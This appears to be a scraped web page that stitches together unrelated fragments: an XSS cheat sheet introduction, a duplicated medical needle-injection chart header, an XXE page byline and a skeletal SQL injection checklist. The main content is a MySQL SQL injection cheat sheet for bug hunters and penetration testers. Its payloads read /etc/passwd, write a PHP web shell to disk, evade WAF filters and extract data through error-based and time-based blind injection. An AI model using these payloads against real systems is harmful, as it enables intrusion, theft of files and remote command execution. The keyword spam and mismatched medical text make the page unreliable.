XSS Cheat Sheet – 2020 Edition Disclaimer We, author and publisher, are not responsible for the use of this material or the damage caused by application of the information provided in this book. Introduction This cheat sheet is meant to be used by bug hunters, penetration testers, security analysts, web application security students. INJECTION SITE CHEAT SHEET Intramuscular (IM) Location Needle Length Needle Gauge Angle of Insertion Needle Length Needle Gauge Angle of Insertion Needle Length Needle Gauge Angle of Insertion Pediatric Adult Children Infants. INJECTION SITE CHEAT SHEET Intramuscular (IM) Location Needle Length Needle Gauge Angle of Insertion Needle Length Needle Gauge Angle of Insertion Needle Length Needle Gauge Angle of Insertion Pediatric Adult Children Infants. May 16, 2015 Cheat Sheets / Infrastructure / Web Application Security. XXE Cheatsheet – XML External Entity Injection. By HollyGraceful May 16, 2015 February 2, 2020. Dec 24, 2010 The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload.
SQL-Injection-cheat-sheet
- First try to figure out the vulnerable parameter
NOTE: If it’s a GET request don’t forget to url encode the characters.
Try with blind injection payloads if above commands does not produce error
Try if above queries work by appending comment at the end
- Now that we know the vulnerable parameter, let’s try guessing the table name:
- Guessing Columns:
- Now determine number of columns in the current table
let say there are 3 columns
- Now determine vulnerable columns or columns which are visible
Else try
Now, lets say column 1,2 are shown in web page
- To futher enumerate
Let say the database name is public and table name is info with two columns in it id and name.
- BYPASSING filters
we can use case switching or commenting to bypass basic filters
- For Oracle DB
Oracle does not have information schema and thus we need some alternatives for it. The link below can be helpful.
https://stackoverflow.com/questions/8739203/oracle-query-to-fetch-column-names
- For Adanced exploitation, we may use sqlmap
Useful Resources
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
http://garage4hackers.com/showthread.php?t=1990
Slack3rsecurity’s SQL injection cheatsheet 2011.
Hello world! I have decided to write a cheatsheet containing all that i have learnt from 2 years in the web application security field, in this post i will be focusing on SQL injection in regards to a PHP/MySQL enviroment .
Comments
/* – Multi line comment.
# – single line comment.
— – single line comment.
/*!*/ – Mysql special comments.
Whitespaces.
+, %2B, %20, %09, %0d ,%0А, /**/, /*foo*/
Global system variables
@@datadir // Mysql data directory.
@@version_compile_os – //OS Mysql is running on.
Url Command Injection Cheat Sheet
@@version – //Mysql database version.
user() – //Current database user.
@@log_error – //Path to error log.
database() – //Current database.
Columns in a SELECT.
file.php?var=1 order by 10– //Unknown column ’10’ in ‘order clause’
file.php?var=1 and(select * from table)=(1)– //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as latin1)– //5.0.11
file.php?var=1 union select convert(version() as binary)– //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)– //5.0.11
file.php?var=1 union select unhex(hex(versions()))– //5.0.11
File_priv.
file.php?var=1 union select user()– //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user=’root’– //Checking for the file priveledge on current user, Y =Yes N=No.
file.php?var=1 union select load_file(‘/etc/passwd’)– // Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)– // Loading system files with error based injection.
file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’– // Write code to a file.
file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”–+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*select*/ version()– //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()– //Filter bypass
file.php?var=1/**/union/**/select/**/version()– //Whitespace bypass
file.php?var=1 UnION SElecT version()– //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()– //php comments.
file.php?var=1 uni%6Fn select version()– //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users– //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0x414141414141414141414141414141414141 union select version()– //Buffer overflow.
file.php?var=1 union select 0x3a3a3a– //Encode to bypass magic quotes.
Extracting data from MySQL errors.
Rand()
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)–
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))–
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) —
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))–
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) —
Name_const(Mysql 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)–
Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))– //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))– //Xpath error
Misc.
Url Injection Cheat Sheet Pdf
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)– //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)– //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a–
Injecting into an order by
file.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))–
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))–
Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) — //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) — //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,.,”,’,~,`,|,{,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))– //BSQLi using bit shifting credits to http://www.websec.ca
Have a question or something you have to add? shoot me a message.
Helpfull links.
http://www.websec.wordpress.com //Great blog & good posts on web application security.
Comments are closed.